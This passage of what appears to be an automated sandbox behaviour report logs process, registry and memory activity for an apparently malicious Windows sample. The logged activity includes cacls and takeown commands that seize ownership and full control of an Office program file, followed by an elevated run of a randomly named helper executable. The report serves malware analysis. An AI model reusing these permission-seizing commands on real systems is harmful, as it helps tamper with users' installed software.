|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 75 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 54 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 17 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 55 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 41 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 224, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x818, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x92c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0x708, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "alfred.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "alfred.exe" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #17: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Microsoft Office 15\alfred.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:26, Reason: Child Process |
| Unmonitor | End Time: 00:03:28, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x818 |
| Parent PID | 0x804 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E58
0x
E5C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000750000 | 0x00750000 | 0x0076ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000750000 | 0x00750000 | 0x0075ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x00763fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x00771fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x00793fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007a0000 | 0x007a0000 | 0x007dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x0081ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x00823fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000830000 | 0x00830000 | 0x00830fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000840000 | 0x00840000 | 0x00841fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000850000 | 0x00850000 | 0x0088ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x008cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008f0000 | 0x008f0000 | 0x008fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00900000 | 0x009bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000a80000 | 0x00a80000 | 0x00b7ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00d70000 | 0x00d79fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d80000 | 0x00d80000 | 0x04d7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004f70000 | 0x04f70000 | 0x04f7ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74490000 | 0x744b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eb30000 | 0x7eb30000 | 0x7ec2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ec30000 | 0x7ec30000 | 0x7ec52fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ec57000 | 0x7ec57000 | 0x7ec57fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec59000 | 0x7ec59000 | 0x7ec5bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec5c000 | 0x7ec5c000 | 0x7ec5efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec5f000 | 0x7ec5f000 | 0x7ec5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #18: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #18 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Microsoft Office 15\alfred.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:28, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x92c |
| Parent PID | 0x804 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B38
0x
5C0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00170000 | 0x0017ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000ad0000 | 0x00ad0000 | 0x04acffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004ad0000 | 0x04ad0000 | 0x04aeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ad0000 | 0x04ad0000 | 0x04adffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004ae0000 | 0x04ae0000 | 0x04ae3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004af0000 | 0x04af0000 | 0x04af1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x04af0000 | 0x04af4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004b00000 | 0x04b00000 | 0x04b13fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b60000 | 0x04b60000 | 0x04b9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ba0000 | 0x04ba0000 | 0x04ba3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004bb0000 | 0x04bb0000 | 0x04bb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004bc0000 | 0x04bc0000 | 0x04bc1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bd0000 | 0x04bd0000 | 0x04c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c10000 | 0x04c10000 | 0x04c10fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c20000 | 0x04c20000 | 0x04c2ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c30000 | 0x04cedfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04deffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004df0000 | 0x04df0000 | 0x04e2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e30000 | 0x04e30000 | 0x04e30fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f70000 | 0x04f70000 | 0x04f7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f80000 | 0x04f80000 | 0x05107fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005110000 | 0x05110000 | 0x05290fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000052a0000 | 0x052a0000 | 0x0669ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x066a0000 | 0x069d6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74480000 | 0x744a7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f570000 | 0x7f570000 | 0x7f66ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f670000 | 0x7f670000 | 0x7f692fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f693000 | 0x7f693000 | 0x7f693fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f698000 | 0x7f698000 | 0x7f698fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f69a000 | 0x7f69a000 | 0x7f69cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f69d000 | 0x7f69d000 | 0x7f69ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #19: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #19 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c vIDhS3md.exe -accepteula "alfred.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:31, Reason: Child Process |
| Unmonitor | End Time: 00:04:33, Reason: Self Terminated |
| Monitor Duration | 00:01:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe04 |
| Parent PID | 0x804 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E0C
0x
E10
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000530000 | 0x00530000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000530000 | 0x00530000 | 0x0053ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x00543fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x00551fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x00553fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x00573fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x006bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x006c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x006d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000006e0000 | 0x006e0000 | 0x006e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x0072ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000730000 | 0x00730000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00740000 | 0x007fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x008fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000930000 | 0x00930000 | 0x00a2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000bd0000 | 0x00bd0000 | 0x00bdffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00be0000 | 0x00f16fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74990000 | 0x74a20fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| sysmain.sdb | 0x7f5e0000 | 0x7f96ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000007f970000 | 0x7f970000 | 0x7fa6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fa70000 | 0x7fa70000 | 0x7fa92fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fa94000 | 0x7fa94000 | 0x7fa94fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa99000 | 0x7fa99000 | 0x7fa9bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa9c000 | 0x7fa9c000 | 0x7fa9efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fa9f000 | 0x7fa9f000 | 0x7fa9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 144, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0xe34, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
